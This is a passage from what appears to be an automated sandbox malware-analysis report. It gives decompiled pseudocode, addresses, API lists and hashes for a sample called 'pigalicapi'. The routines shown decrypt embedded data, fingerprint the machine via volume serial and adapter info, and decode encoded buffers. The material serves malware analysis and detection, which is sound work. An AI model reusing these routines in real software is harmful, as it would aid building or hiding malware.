                                                                                                                                                                                                                                                    						L20:
                                                                                                                                                                                                                                                    						if(_v1316 != 0) {
                                                                                                                                                                                                                                                    							VirtualFree(_v1316, 0, 0x8000);
                                                                                                                                                                                                                                                    							_v1316 = 0;
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    						goto L22;
                                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                                    						FindCloseChangeNotification(_v784); // executed
                                                                                                                                                                                                                                                    						_v784 = 0;
                                                                                                                                                                                                                                                    						_t101 = E00EC47F0(_v1316, _v1312, _a8); // executed
                                                                                                                                                                                                                                                    						_t156 = _t155 + 0xc;
                                                                                                                                                                                                                                                    						if((_t101 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                    							if(_v1316 != 0) {
                                                                                                                                                                                                                                                    								VirtualFree(_v1316, 0, 0x8000); // executed
                                                                                                                                                                                                                                                    								_v1316 = 0;
                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                    							_v1328 = _a4 +  *((intOrPtr*)(_a4 + 0x3c));
                                                                                                                                                                                                                                                    							_v1324 = _v1328 + ( *(_v1328 + 0x14) & 0x0000ffff) + 0x18;
                                                                                                                                                                                                                                                    							_v1332 = 0;
                                                                                                                                                                                                                                                    							while(_v1332 < ( *(_v1328 + 6) & 0x0000ffff)) {
                                                                                                                                                                                                                                                    								_v1336 =  *((intOrPtr*)(_v1324 + 0xc + _v1332 * 0x28)) + _a4;
                                                                                                                                                                                                                                                    								if( *((intOrPtr*)(_v1324 + 8 + _v1332 * 0x28)) <=  *((intOrPtr*)(_v1324 + 0x10 + _v1332 * 0x28))) {
                                                                                                                                                                                                                                                    									_v1344 =  *((intOrPtr*)(_v1324 + 0x10 + _v1332 * 0x28));
                                                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                                                    									_v1344 =  *((intOrPtr*)(_v1324 + 8 + _v1332 * 0x28));
                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                    								_v1340 = _v1344;
                                                                                                                                                                                                                                                    								_t114 = E00EC47F0(_v1336, _v1340, _a8); // executed
                                                                                                                                                                                                                                                    								_t156 = _t156 + 0xc;
                                                                                                                                                                                                                                                    								if((_t114 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                    									_v1332 = _v1332 + 1;
                                                                                                                                                                                                                                                    									continue;
                                                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                                                    									_v5 = 1;
                                                                                                                                                                                                                                                    									goto L20;
                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                    							goto L20;
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    						_v5 = 1;
                                                                                                                                                                                                                                                    						goto L20;
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    			}
























                                                                                                                                                                                                                                                    0x00ec451a
                                                                                                                                                                                                                                                    0x00ec4522
                                                                                                                                                                                                                                                    0x00ec47e6
                                                                                                                                                                                                                                                    0x00ec47ed
                                                                                                                                                                                                                                                    0x00ec4532
                                                                                                                                                                                                                                                    0x00ec4556
                                                                                                                                                                                                                                                    0x00ec455b
                                                                                                                                                                                                                                                    0x00ec456c
                                                                                                                                                                                                                                                    0x00ec458b
                                                                                                                                                                                                                                                    0x00ec4591
                                                                                                                                                                                                                                                    0x00ec459e
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00ec45b3
                                                                                                                                                                                                                                                    0x00ec45c0
                                                                                                                                                                                                                                                    0x00ec47d0
                                                                                                                                                                                                                                                    0x00ec47d7
                                                                                                                                                                                                                                                    0x00ec47e0
                                                                                                                                                                                                                                                    0x00ec47e0
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00ec47d7
                                                                                                                                                                                                                                                    0x00ec45d6
                                                                                                                                                                                                                                                    0x00ec45dc
                                                                                                                                                                                                                                                    0x00ec45e9
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00ec45ef
                                                                                                                                                                                                                                                    0x00ec4617
                                                                                                                                                                                                                                                    0x00ec461f
                                                                                                                                                                                                                                                    0x00ec47a9
                                                                                                                                                                                                                                                    0x00ec47b0
                                                                                                                                                                                                                                                    0x00ec47c0
                                                                                                                                                                                                                                                    0x00ec47c6
                                                                                                                                                                                                                                                    0x00ec47c6
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00ec4637
                                                                                                                                                                                                                                                    0x00ec463e
                                                                                                                                                                                                                                                    0x00ec4644
                                                                                                                                                                                                                                                    0x00ec4660
                                                                                                                                                                                                                                                    0x00ec4665
                                                                                                                                                                                                                                                    0x00ec466d
                                                                                                                                                                                                                                                    0x00ec467f
                                                                                                                                                                                                                                                    0x00ec468f
                                                                                                                                                                                                                                                    0x00ec4695
                                                                                                                                                                                                                                                    0x00ec4695
                                                                                                                                                                                                                                                    0x00ec46a8
                                                                                                                                                                                                                                                    0x00ec46c2
                                                                                                                                                                                                                                                    0x00ec46c8
                                                                                                                                                                                                                                                    0x00ec46e3
                                                                                                                                                                                                                                                    0x00ec470f
                                                                                                                                                                                                                                                    0x00ec473b
                                                                                                                                                                                                                                                    0x00ec476b
                                                                                                                                                                                                                                                    0x00ec473d
                                                                                                                                                                                                                                                    0x00ec4750
                                                                                                                                                                                                                                                    0x00ec4750
                                                                                                                                                                                                                                                    0x00ec4777
                                                                                                                                                                                                                                                    0x00ec478f
                                                                                                                                                                                                                                                    0x00ec4794
                                                                                                                                                                                                                                                    0x00ec479c
                                                                                                                                                                                                                                                    0x00ec46dd
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00ec479e
                                                                                                                                                                                                                                                    0x00ec479e
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00ec479e
                                                                                                                                                                                                                                                    0x00ec479c
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00ec46e3
                                                                                                                                                                                                                                                    0x00ec466f
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00ec466f
                                                                                                                                                                                                                                                    0x00ec461f

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000208), ref: 00EC456C
                                                                                                                                                                                                                                                    • CreateFileA.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00EC458B
                                                                                                                                                                                                                                                    • GetFileSize.KERNEL32(000000FF,00000000), ref: 00EC45AD
                                                                                                                                                                                                                                                    • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 00EC45D6
                                                                                                                                                                                                                                                    • ReadFile.KERNEL32(000000FF,00000000,00000000,00000000,00000000), ref: 00EC4617
                                                                                                                                                                                                                                                    • FindCloseChangeNotification.KERNEL32(000000FF), ref: 00EC463E
                                                                                                                                                                                                                                                      • Part of subcall function 00EC47F0: CryptAcquireContextA.ADVAPI32(00000000,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000), ref: 00EC482A
                                                                                                                                                                                                                                                      • Part of subcall function 00EC47F0: GetLastError.KERNEL32 ref: 00EC4834
                                                                                                                                                                                                                                                      • Part of subcall function 00EC47F0: CryptAcquireContextA.ADVAPI32(00000000,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 00EC4850
                                                                                                                                                                                                                                                      • Part of subcall function 00EC47F0: CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 00EC48EB
                                                                                                                                                                                                                                                      • Part of subcall function 00EC47F0: CryptHashData.ADVAPI32(00000000,?,00000010,00000000), ref: 00EC490B
                                                                                                                                                                                                                                                      • Part of subcall function 00EC47F0: CryptDeriveKey.ADVAPI32(00000000,00006801,00000000,00000001,00000000), ref: 00EC493C
                                                                                                                                                                                                                                                      • Part of subcall function 00EC47F0: CryptDecrypt.ADVAPI32(00000000,00000000,00000001,00000000,?,000002F0), ref: 00EC496F
                                                                                                                                                                                                                                                      • Part of subcall function 00EC47F0: CryptDestroyKey.ADVAPI32(00000000), ref: 00EC4982
                                                                                                                                                                                                                                                    • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00EC468F
                                                                                                                                                                                                                                                    • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00EC47C0
                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00EC47E0
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.860103508.0000000000EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_ec0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Crypt$File$Virtual$AcquireCloseContextCreateFreeHash$AllocChangeDataDecryptDeriveDestroyErrorFindHandleLastModuleNameNotificationReadSize
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2585753175-0
                                                                                                                                                                                                                                                    • Opcode ID: a96c4b6ecb41e8832a4e83ea280d3615f60708025235a010108217efc29b0616
                                                                                                                                                                                                                                                    • Instruction ID: 4b0b5f271161282d2950051eaa422e2369bc6e1abda85b7c0ed69a9ac1aa1b57
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a96c4b6ecb41e8832a4e83ea280d3615f60708025235a010108217efc29b0616
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 888169B49016289BDB24CB10DCA5FAAB7B4AF49306F10A1D9E508BB2C1D7759F86CF50
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    C-Code - Quality: 68%
                                                                                                                                                                                                                                                    			E00EC9D20(intOrPtr _a4, CHAR* _a8, int _a12) {
                                                                                                                                                                                                                                                    				char _v5;
                                                                                                                                                                                                                                                    				intOrPtr _v12;
                                                                                                                                                                                                                                                    				intOrPtr _v16;
                                                                                                                                                                                                                                                    				long _v20;
                                                                                                                                                                                                                                                    				intOrPtr _v24;
                                                                                                                                                                                                                                                    				char _v292;
                                                                                                                                                                                                                                                    				intOrPtr _v296;
                                                                                                                                                                                                                                                    				char _v404;
                                                                                                                                                                                                                                                    				long _v408;
                                                                                                                                                                                                                                                    				char _v673;
                                                                                                                                                                                                                                                    				char _v676;
                                                                                                                                                                                                                                                    				intOrPtr _v680;
                                                                                                                                                                                                                                                    				long _v684;
                                                                                                                                                                                                                                                    				signed int _v688;
                                                                                                                                                                                                                                                    				short* _v692;
                                                                                                                                                                                                                                                    				signed int _v696;
                                                                                                                                                                                                                                                    				unsigned int _v700;
                                                                                                                                                                                                                                                    				intOrPtr _v704;
                                                                                                                                                                                                                                                    				char _v900;
                                                                                                                                                                                                                                                    				signed int _v904;
                                                                                                                                                                                                                                                    				signed int _v908;
                                                                                                                                                                                                                                                    				int _v912;
                                                                                                                                                                                                                                                    				int _t71;
                                                                                                                                                                                                                                                    				void* _t74;
                                                                                                                                                                                                                                                    				short** _t76;
                                                                                                                                                                                                                                                    				void* _t114;
                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                    				_v5 = 0;
                                                                                                                                                                                                                                                    				if(_a4 != 0 && _a8 != 0 && _a12 > 0) {
                                                                                                                                                                                                                                                    					_v12 = 0x20;
                                                                                                                                                                                                                                                    					_v24 = 6;
                                                                                                                                                                                                                                                    					_v684 = 0;
                                                                                                                                                                                                                                                    					_v20 = 0;
                                                                                                                                                                                                                                                    					_v408 = 0;
                                                                                                                                                                                                                                                    					_v16 = 0x19660d;
                                                                                                                                                                                                                                                    					_v296 = 0x3c6ef35f;
                                                                                                                                                                                                                                                    					_v680 = _a4;
                                                                                                                                                                                                                                                    					if(GetSystemDirectoryA( &_v676, 0x103) != 0) {
                                                                                                                                                                                                                                                    						_v673 = 0;
                                                                                                                                                                                                                                                    						_t71 = GetVolumeInformationA( &_v676,  &_v292, 0x103,  &_v684,  &_v20,  &_v408,  &_v404, 0x63); // executed
                                                                                                                                                                                                                                                    						if(_t71 != 0) {
                                                                                                                                                                                                                                                    							_v688 = 0xffffffff;
                                                                                                                                                                                                                                                    							E00EC7D20(_t71,  &_v900, 0, 0xc0);
                                                                                                                                                                                                                                                    							_v700 = 0;
                                                                                                                                                                                                                                                    							_t74 = E00EC9F70( &_v900, 0xc0,  &_v700); // executed
                                                                                                                                                                                                                                                    							if(_t74 != 0) {
                                                                                                                                                                                                                                                    								_v904 = 0;
                                                                                                                                                                                                                                                    								while(_v904 < _v700 >> 2) {
                                                                                                                                                                                                                                                    									_v688 = _v688 ^  *(_t114 + _v904 * 4 - 0x380);
                                                                                                                                                                                                                                                    									_v904 = _v904 + 1;
                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                    							_v696 = _v684;
                                                                                                                                                                                                                                                    							_v908 = 0;
                                                                                                                                                                                                                                                    							while(_v908 < 4) {
                                                                                                                                                                                                                                                    								 *(_v680 + _v908 * 4) = 0x3c6ef35f + _v696 * 0x0019660d ^ _v688;
                                                                                                                                                                                                                                                    								_v696 = 0x3c6ef35f + _v696 * 0x19660d;
                                                                                                                                                                                                                                                    								_v908 = _v908 + 1;
                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                    							_t76 =  &_v692;
                                                                                                                                                                                                                                                    							__imp__StringFromCLSID(_a4, _t76); // executed
                                                                                                                                                                                                                                                    							_v704 = _t76;
                                                                                                                                                                                                                                                    							if(_v704 >= 0) {
                                                                                                                                                                                                                                                    								_v912 = WideCharToMultiByte(0, 0, _v692, 0xffffffff, _a8, _a12, 0, 0);
                                                                                                                                                                                                                                                    								lstrcpynA(_a8,  &(_a8[1]), _v912 - 2);
                                                                                                                                                                                                                                                    								_v5 = 1;
                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                    							__imp__CoTaskMemFree(_v692);
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				return _v5;
                                                                                                                                                                                                                                                    			}





























                                                                                                                                                                                                                                                    0x00ec9d29
                                                                                                                                                                                                                                                    0x00ec9d31
                                                                                                                                                                                                                                                    0x00ec9d4b
                                                                                                                                                                                                                                                    0x00ec9d52
                                                                                                                                                                                                                                                    0x00ec9d59
                                                                                                                                                                                                                                                    0x00ec9d63
                                                                                                                                                                                                                                                    0x00ec9d6a
                                                                                                                                                                                                                                                    0x00ec9d74
                                                                                                                                                                                                                                                    0x00ec9d7b
                                                                                                                                                                                                                                                    0x00ec9d88
                                                                                                                                                                                                                                                    0x00ec9da2
                                                                                                                                                                                                                                                    0x00ec9da8
                                                                                                                                                                                                                                                    0x00ec9ddd
                                                                                                                                                                                                                                                    0x00ec9de5
                                                                                                                                                                                                                                                    0x00ec9deb
                                                                                                                                                                                                                                                    0x00ec9e03
                                                                                                                                                                                                                                                    0x00ec9e0b
                                                                                                                                                                                                                                                    0x00ec9e28
                                                                                                                                                                                                                                                    0x00ec9e32
                                                                                                                                                                                                                                                    0x00ec9e34
                                                                                                                                                                                                                                                    0x00ec9e4f
                                                                                                                                                                                                                                                    0x00ec9e73
                                                                                                                                                                                                                                                    0x00ec9e49
                                                                                                                                                                                                                                                    0x00ec9e49
                                                                                                                                                                                                                                                    0x00ec9e4f
                                                                                                                                                                                                                                                    0x00ec9e81
                                                                                                                                                                                                                                                    0x00ec9e87
                                                                                                                                                                                                                                                    0x00ec9ea2
                                                                                                                                                                                                                                                    0x00ec9ecf
                                                                                                                                                                                                                                                    0x00ec9ee4
                                                                                                                                                                                                                                                    0x00ec9e9c
                                                                                                                                                                                                                                                    0x00ec9e9c
                                                                                                                                                                                                                                                    0x00ec9eec
                                                                                                                                                                                                                                                    0x00ec9ef7
                                                                                                                                                                                                                                                    0x00ec9efd
                                                                                                                                                                                                                                                    0x00ec9f0a
                                                                                                                                                                                                                                                    0x00ec9f2b
                                                                                                                                                                                                                                                    0x00ec9f46
                                                                                                                                                                                                                                                    0x00ec9f4c
                                                                                                                                                                                                                                                    0x00ec9f4c
                                                                                                                                                                                                                                                    0x00ec9f57
                                                                                                                                                                                                                                                    0x00ec9f57
                                                                                                                                                                                                                                                    0x00ec9de5
                                                                                                                                                                                                                                                    0x00ec9da2
                                                                                                                                                                                                                                                    0x00ec9f63

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetSystemDirectoryA.KERNEL32 ref: 00EC9D9A
                                                                                                                                                                                                                                                    • GetVolumeInformationA.KERNEL32(?,?,00000103,00000000,00000000,00000000,?,00000063), ref: 00EC9DDD
                                                                                                                                                                                                                                                      • Part of subcall function 00EC9F70: GetAdaptersInfo.IPHLPAPI(00000000,00EC9E2D), ref: 00EC9FEB
                                                                                                                                                                                                                                                    • StringFromCLSID.OLE32(00000020,?), ref: 00EC9EF7
                                                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,0019660D,00000000,00000000,00000000), ref: 00EC9F25
                                                                                                                                                                                                                                                    • lstrcpynA.KERNEL32(0019660D,0019660C,?), ref: 00EC9F46
                                                                                                                                                                                                                                                    • CoTaskMemFree.OLE32(?), ref: 00EC9F57
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.860103508.0000000000EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_ec0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: AdaptersByteCharDirectoryFreeFromInfoInformationMultiStringSystemTaskVolumeWidelstrcpyn
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2697952880-3916222277
                                                                                                                                                                                                                                                    • Opcode ID: c919399357eecee3a3d9b308259aa2e373dd91c8a0d71ff910e385d857fd0220
                                                                                                                                                                                                                                                    • Instruction ID: 1aad7193943e0e7765069d355ab2fde26ebff28e5ecc33a089f0a81a2b094423
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c919399357eecee3a3d9b308259aa2e373dd91c8a0d71ff910e385d857fd0220
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EE513870A013189FDB25CF50CD88BEAB7B9BB44304F1482DDE50DAA281DB729B89CF51
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                                    			E00EC1390(signed int __eax, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                                                                                                                                                    				signed char* _v8;
                                                                                                                                                                                                                                                    				char _v12;
                                                                                                                                                                                                                                                    				char _v16;
                                                                                                                                                                                                                                                    				intOrPtr _v20;
                                                                                                                                                                                                                                                    				long _v24;
                                                                                                                                                                                                                                                    				void* _v28;
                                                                                                                                                                                                                                                    				long _v32;
                                                                                                                                                                                                                                                    				signed int _t52;
                                                                                                                                                                                                                                                    				signed int _t57;
                                                                                                                                                                                                                                                    				intOrPtr _t64;
                                                                                                                                                                                                                                                    				void* _t76;
                                                                                                                                                                                                                                                    				void* _t103;
                                                                                                                                                                                                                                                    				void* _t104;
                                                                                                                                                                                                                                                    				void* _t106;
                                                                                                                                                                                                                                                    				void* _t107;
                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                    				_t52 = __eax;
                                                                                                                                                                                                                                                    				if(_a4 == 0 || _a8 == 0 || _a4 == 0 || _a16 == 0) {
                                                                                                                                                                                                                                                    					return _t52 | 0xffffffff;
                                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                                    					_v24 = 0;
                                                                                                                                                                                                                                                    					_t57 = RtlAllocateHeap(GetProcessHeap(), 8, _a8 + 5); // executed
                                                                                                                                                                                                                                                    					_v28 = _t57;
                                                                                                                                                                                                                                                    					if(_v28 != 0) {
                                                                                                                                                                                                                                                    						E00EC7B70(_v28, _a4, _a8);
                                                                                                                                                                                                                                                    						E00EC7B70(_v28 + _a8, "====", 4);
                                                                                                                                                                                                                                                    						_t106 = _t104 + 0x18;
                                                                                                                                                                                                                                                    						_v8 = _v28;
                                                                                                                                                                                                                                                    						_v20 = 3;
                                                                                                                                                                                                                                                    						while(_v20 == 3) {
                                                                                                                                                                                                                                                    							_v32 = 0;
                                                                                                                                                                                                                                                    							while(_v32 < 4) {
                                                                                                                                                                                                                                                    								while( *_v8 != 0x3d) {
                                                                                                                                                                                                                                                    									_t76 = E00EC1500( *_v8 & 0x000000ff);
                                                                                                                                                                                                                                                    									_t106 = _t106 + 4;
                                                                                                                                                                                                                                                    									if(_t76 >= 0) {
                                                                                                                                                                                                                                                    										break;
                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                    									_v8 =  &(_v8[1]);
                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                    								 *((char*)(_t103 + _v32 - 0xc)) =  *_v8;
                                                                                                                                                                                                                                                    								_v8 =  &(_v8[1]);
                                                                                                                                                                                                                                                    								_v32 = _v32 + 1;
                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                    							_t64 = E00EC1580( &_v16,  &_v12);
                                                                                                                                                                                                                                                    							_t107 = _t106 + 8;
                                                                                                                                                                                                                                                    							_v20 = _t64;
                                                                                                                                                                                                                                                    							if(_a16 >= _v20) {
                                                                                                                                                                                                                                                    								E00EC7B70(_a12,  &_v12, _v20);
                                                                                                                                                                                                                                                    								_t106 = _t107 + 0xc;
                                                                                                                                                                                                                                                    								_a12 = _a12 + _v20;
                                                                                                                                                                                                                                                    								_a16 = _a16 - _v20;
                                                                                                                                                                                                                                                    								_v24 = _v24 + _v20;
                                                                                                                                                                                                                                                    								continue;
                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                    							return HeapFree(GetProcessHeap(), 0, _v28) | 0xffffffff;
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    						RtlFreeHeap(GetProcessHeap(), 0, _v28); // executed
                                                                                                                                                                                                                                                    						return _v24;
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					return _t57 | 0xffffffff;
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    			}


















                                                                                                                                                                                                                                                    0x00ec1390
                                                                                                                                                                                                                                                    0x00ec139a
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00ec13b6
                                                                                                                                                                                                                                                    0x00ec13b6
                                                                                                                                                                                                                                                    0x00ec13cd
                                                                                                                                                                                                                                                    0x00ec13d3
                                                                                                                                                                                                                                                    0x00ec13da
                                                                                                                                                                                                                                                    0x00ec13f0
                                                                                                                                                                                                                                                    0x00ec1406
                                                                                                                                                                                                                                                    0x00ec140b
                                                                                                                                                                                                                                                    0x00ec1411
                                                                                                                                                                                                                                                    0x00ec1414
                                                                                                                                                                                                                                                    0x00ec141b
                                                                                                                                                                                                                                                    0x00ec1425
                                                                                                                                                                                                                                                    0x00ec1437
                                                                                                                                                                                                                                                    0x00ec143d
                                                                                                                                                                                                                                                    0x00ec144f
                                                                                                                                                                                                                                                    0x00ec1454
                                                                                                                                                                                                                                                    0x00ec1459
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00ec1461
                                                                                                                                                                                                                                                    0x00ec1461
                                                                                                                                                                                                                                                    0x00ec146e
                                                                                                                                                                                                                                                    0x00ec1478
                                                                                                                                                                                                                                                    0x00ec1434
                                                                                                                                                                                                                                                    0x00ec1434
                                                                                                                                                                                                                                                    0x00ec1485
                                                                                                                                                                                                                                                    0x00ec148a
                                                                                                                                                                                                                                                    0x00ec148d
                                                                                                                                                                                                                                                    0x00ec1496
                                                                                                                                                                                                                                                    0x00ec14bc
                                                                                                                                                                                                                                                    0x00ec14c1
                                                                                                                                                                                                                                                    0x00ec14ca
                                                                                                                                                                                                                                                    0x00ec14d3
                                                                                                                                                                                                                                                    0x00ec14dc
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00ec14dc
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00ec14ab
                                                                                                                                                                                                                                                    0x00ec14f1
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00ec14f7
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00ec13dc

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,-00000005), ref: 00EC13C6
                                                                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00EC13CD
                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00EC149E
                                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 00EC14A5
                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00EC14EA
                                                                                                                                                                                                                                                    • RtlFreeHeap.NTDLL(00000000), ref: 00EC14F1
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.860103508.0000000000EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_ec0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Heap$Process$Free$Allocate
                                                                                                                                                                                                                                                    • String ID: ====
                                                                                                                                                                                                                                                    • API String ID: 168621272-1026985228
                                                                                                                                                                                                                                                    • Opcode ID: 00e5451c3a036a4ba746890f393efa29b3da0958603ba449d05a22f4a85d87f4
                                                                                                                                                                                                                                                    • Instruction ID: 6ee27430001872da87b153af6431979294878cb3325ae6a93b4dda5884b9ada8
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 00e5451c3a036a4ba746890f393efa29b3da0958603ba449d05a22f4a85d87f4
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0B415BB4D00209DFCB04CFA8CA55FEE7BB5BF45309F208559E525B7292D3329A46CB91
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    C-Code - Quality: 96%
                                                                                                                                                                                                                                                    			E00EC7970(intOrPtr* _a4) {
                                                                                                                                                                                                                                                    				long _v8;
                                                                                                                                                                                                                                                    				void* _v12;
                                                                                                                                                                                                                                                    				int _v16;
                                                                                                                                                                                                                                                    				long _v20;
                                                                                                                                                                                                                                                    				intOrPtr _v24;
                                                                                                                                                                                                                                                    				signed int _v28;
                                                                                                                                                                                                                                                    				intOrPtr _v32;
                                                                                                                                                                                                                                                    				signed int _v36;
                                                                                                                                                                                                                                                    				void* _v40;
                                                                                                                                                                                                                                                    				char _v44;
                                                                                                                                                                                                                                                    				signed int _v48;
                                                                                                                                                                                                                                                    				intOrPtr _v52;
                                                                                                                                                                                                                                                    				void* _t50;
                                                                                                                                                                                                                                                    				intOrPtr _t52;
                                                                                                                                                                                                                                                    				void* _t58;
                                                                                                                                                                                                                                                    				intOrPtr _t64;
                                                                                                                                                                                                                                                    				intOrPtr _t72;
                                                                                                                                                                                                                                                    				intOrPtr _t83;
                                                                                                                                                                                                                                                    				void* _t96;
                                                                                                                                                                                                                                                    				void* _t97;
                                                                                                                                                                                                                                                    				void* _t98;
                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                    				_v8 = 0;
                                                                                                                                                                                                                                                    				if(_a4 != 0) {
                                                                                                                                                                                                                                                    					_v16 = 0x8c;
                                                                                                                                                                                                                                                    					_v20 = 0x75bc;
                                                                                                                                                                                                                                                    					_t50 = VirtualAlloc(0, 0x75bc, 0x3000, 4); // executed
                                                                                                                                                                                                                                                    					_v12 = _t50;
                                                                                                                                                                                                                                                    					if(_v12 != 0) {
                                                                                                                                                                                                                                                    						_t72 =  *0xece28c; // 0xed3f88
                                                                                                                                                                                                                                                    						_t83 =  *0xed18a0; // 0xed3b88
                                                                                                                                                                                                                                                    						_t52 = E00ECA400(_t83, _t72, _v12, 0x75bc); // executed
                                                                                                                                                                                                                                                    						_t97 = _t96 + 0x10;
                                                                                                                                                                                                                                                    						_v24 = _t52;
                                                                                                                                                                                                                                                    						if(_v24 >= 0x92) {
                                                                                                                                                                                                                                                    							_v28 = _v24 - 0x8c;
                                                                                                                                                                                                                                                    							_t58 = E00EC8A70(_v12 + 0x8c,  &_v28, _v12, 0x8c, 0xed30e8, 0x254);
                                                                                                                                                                                                                                                    							_t98 = _t97 + 0x18;
                                                                                                                                                                                                                                                    							if(_t58 != 0) {
                                                                                                                                                                                                                                                    								_v32 = _v12 + 0x8c;
                                                                                                                                                                                                                                                    								_v36 = _v28 / 6;
                                                                                                                                                                                                                                                    								_v40 = VirtualAlloc(0, _v36 * 0x28, 0x3000, 4);
